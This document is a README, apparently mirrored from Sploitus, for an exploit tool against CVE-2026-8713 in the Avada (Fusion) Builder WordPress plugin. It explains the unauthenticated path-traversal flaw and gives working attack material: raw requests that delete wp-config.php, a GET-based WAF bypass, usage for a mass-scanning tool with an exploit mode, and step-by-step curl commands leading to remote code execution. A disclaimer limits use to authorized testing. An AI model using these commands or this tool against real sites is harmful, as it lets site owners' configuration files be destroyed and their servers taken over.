Share
## https://sploitus.com/exploit?id=6E4D26B8-DE2F-5FAB-85C9-D38C397BEE5F
CVE-2026-8713 โ Avada (Fusion) Builder WordPress Exploit
Pre-Auth Path Traversal โ Arbitrary File Delete โ Force Reinstall โ RCE
---
## Overview
**CVE-2026-8713** is a CVSS 9.1 critical vulnerability in the **Avada (Fusion) Builder** plugin/theme for WordPress. The `maybe_delete_files()` function in the `Fusion_Form_DB_Entries` class constructs filesystem paths from attacker-controlled form entry values using simple string replacement โ without `realpath()` validation or directory containment checks.
An unauthenticated attacker submits a path traversal payload via the `fusion_form_submit_ajax` handler. When the `Fusion_Form_DB_Privacy` shutdown hook processes the entry with `privacy_expiration_action=delete`, the targeted file is removed from the server.
### Affected Versions
| Version | Status |
|---|---|
| Fusion Builder โค 3.15.3 | Vulnerable |
| Fusion Builder โฅ 3.15.4 | Patched |
| Avada theme (all) | Bundled plugin may be vulnerable |
> **Note:** The Avada theme version (7.x) differs from the Fusion Builder plugin version (3.x). The vulnerability is in the **plugin**, but the scanner detects both.
---
## Vulnerability Mechanism
### Root Cause
In `fusion-builder/inc/class-fusion-form-db-entries.php`, the `maybe_delete_files()` method resolves file paths using string replacement without containment validation:
```php
$file_path = str_replace($upload['url'], $upload['path'], $value);
// No realpath() check โ path traversal sequences pass through
unlink($file_path);
```
### Attack Chain
```
1. Attacker submits Avada form via wp_ajax_nopriv_fusion_form_submit_ajax
โ Path traversal: ../../wp-config.php
โ privacy_expiration_action = delete
โ privacy_expiration_interval = 0
2. WordPress shutdown hook fires Fusion_Form_DB_Privacy
โ Processes stored form entry
โ Calls maybe_delete_files() on attacker-controlled path
โ wp-config.php deleted
3. WordPress enters setup/install mode
โ Attacker connects site to malicious database
โ Full remote code execution
```
### Unauthenticated Access
The AJAX handler is registered with `wp_ajax_nopriv_`, making it accessible to unauthenticated users:
```
POST /wp-admin/admin-ajax.php
action=fusion_form_submit_ajax
form_id=
privacy_expiration_action=delete
fusion_privacy_expiration_interval=0
fusion_form_field_=../../wp-config.php
```
### WAF Bypass
Many hosts block POST to `/wp-admin/admin-ajax.php`. WordPress accepts parameters via GET on this endpoint, providing a trivial bypass:
```
GET /wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=&privacy_expiration_action=delete&...
```
---
## Installation
```bash
git clone https://github.com/shinthink/CVE-2026-8713.git
cd CVE-2026-8713
pip install -r requirements.txt
```
---
## Usage
```bash
# Detection only (default โ no file deletion)
python cve_2026_8713.py -t target.com
# Mass detection
python cve_2026_8713.py -f targets.txt
# Exploit mode โ delete wp-config.php
python cve_2026_8713.py -t target.com --exploit
# Delete custom file
python cve_2026_8713.py -t target.com --exploit --delete "../../../debug.log"
```
### Arguments
```
-t, --target Single target (domain or IP)
-f, --file Target list, one per line
--exploit Enable file deletion (default: detection only)
--delete PATH Custom file path to delete (default: wp-config.php)
-o, --output Save results to file
--threads Workers (default: 20)
-v, --verbose Show detailed output
```
---
## Proof of Concept
### Detection Mode
```bash
$ python cve_2026_8713.py -f targets.txt
```
```
CVE-2026-8713 Avada (Fusion) Builder | CVSS 9.1
Mode: Detection | Targets: 521 | Workers: 20
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
[EXPLOIT] target-vuln.com 1.2s form #3 (AJAX open)
[VULN] target-waf.com 2.1s form #1 (WAF blocked)
[AVADA] target-noform.com 0.5s (no form found)
[-] target-noavada.com 0.3s
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Scan complete | Time: 45s
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
Targets : 521
Avada detected : 47
Forms found : 12
Vulnerable : 9
```
### Exploit Mode
```bash
$ python cve_2026_8713.py -t target.com --exploit -v
```
```
CVE-2026-8713 โ Avada Builder Exploit
CVSS 9.1 | Pre-Auth | Path Traversal โ File Delete โ RCE
[+] Found Avada form: id=3
[+] POST form_id=3: HTTP 403 (WAF blocked)
[+] GET form_id=3: HTTP 200 (WAF bypassed)
Host : target.com
Avada : YES
Form : 3
Deleted : wp-config.php (force reinstall โ RCE)
Time : 3.2s
```
### Manual Exploitation
**Step 1 โ Verify Avada**
```bash
curl -sk 'https://target.com/wp-content/themes/Avada/style.css' | head -5
```
**Step 2 โ Find form ID**
```bash
curl -sk 'https://target.com/' | grep -oP 'fusion-form[^"]*form-id=["\x27](\d+)'
```
**Step 3 โ Submit form with path traversal**
```bash
curl -sk -X POST \
-d 'action=fusion_form_submit_ajax' \
-d 'form_id=3' \
-d 'privacy_expiration_action=delete' \
-d 'fusion_privacy_expiration_interval=0' \
-d 'fusion_form_field_x=../../wp-config.php' \
'https://target.com/wp-admin/admin-ajax.php'
```
**Step 4 โ WAF Bypass (if POST blocked)**
```bash
curl -sk 'https://target.com/wp-admin/admin-ajax.php?action=fusion_form_submit_ajax&form_id=3&privacy_expiration_action=delete&fusion_privacy_expiration_interval=0&fusion_form_field_x=../../wp-config.php'
```
**Step 5 โ Verify & Exploit RCE**
```bash
# Site in install mode?
curl -sk -o /dev/null -w '%{http_code}' 'https://target.com/wp-admin/install.php'
# HTTP 200 โ wp-config deleted โ connect malicious DB โ full RCE
```
---
## Disclaimer
> **FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY.**
>
> This software is intended for security professionals conducting authorized penetration tests, organizations auditing their own infrastructure, and researchers studying vulnerability exploitation.
>
> Unauthorized access to computer systems is illegal and may violate:
> - United States: Computer Fraud and Abuse Act (18 U.S.C. 1030)
> - Indonesia: UU ITE Pasal 30 & 46
> - European Union: Directive 2013/40/EU
> - United Kingdom: Computer Misuse Act 1990
>
> The authors assume no liability for misuse.
---
## References
| Resource | Link |
|---|---|
| IONIX Advisory | [ionix.io/threat-center/cve-2026-8713](https://www.ionix.io/threat-center/cve-2026-8713/) |
| Wordfence Advisory | [wordfence.com](https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fusion-builder/avada-fusion-builder-3153-unauthenticated-arbitrary-file-deletion) |
| Patchstack | [patchstack.com](https://patchstack.com/database/wordpress/plugin/fusion-builder/) |
| NVD Entry | [CVE-2026-8713](https://nvd.nist.gov/vuln/detail/CVE-2026-8713) |
---
This project is not affiliated with ThemeFusion or Avada.